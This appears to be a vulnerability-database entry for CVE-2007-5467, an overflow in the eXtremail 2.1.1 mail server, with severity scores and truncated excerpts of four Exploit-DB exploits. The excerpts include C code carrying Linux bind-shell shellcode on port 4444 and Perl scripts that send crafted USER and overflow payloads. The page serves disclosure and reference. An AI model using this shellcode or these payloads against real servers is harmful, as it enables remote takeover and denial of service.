CVE-2007-5467
published 2007-10-15CVE-2007-5467: Integer overflow in eXtremail 2.1.1 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long USER…
PriorityP349critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
13.52%
96.0th percentile
Integer overflow in eXtremail 2.1.1 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long USER command containing "%s" sequences to the pop3 port (110/tcp), which are expanded to "%%s" before being used in the memmove function, possibly due to an incomplete fix for CVE-2001-1078.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extremail | extremail | <= 2.1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - Remote Heap Overflow (PoC)
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
---
#!/usr/bin/perl
#
# extremail-v8.pl
#
# Copyright (c) 2007 by
#
# eXtremail * Connected\n");
sleep(16);
print("-> * Sending payload\n");
$buf = "\x00".($NOP x (0x2710-1));
send(SOCKET, $buf, 0);
sleep($send_delay);
$buf = $NOP x 0x2710;
while ($loop--) {
print("-> * Sending payload ".$loop."\n");
send(SOCKET, $buf, 0);
sleep($send_delay);
}
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyna
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
No writeups or analysis indexed.
http://secunia.com/advisories/27220http://www.digit-labs.org/files/exploits/extremail-v3.plhttp://www.securityfocus.com/archive/1/482293http://www.securityfocus.com/bid/26074https://www.exploit-db.com/exploits/4532http://secunia.com/advisories/27220http://www.digit-labs.org/files/exploits/extremail-v3.plhttp://www.securityfocus.com/archive/1/482293http://www.securityfocus.com/bid/26074https://www.exploit-db.com/exploits/4532
2007-10-15
Published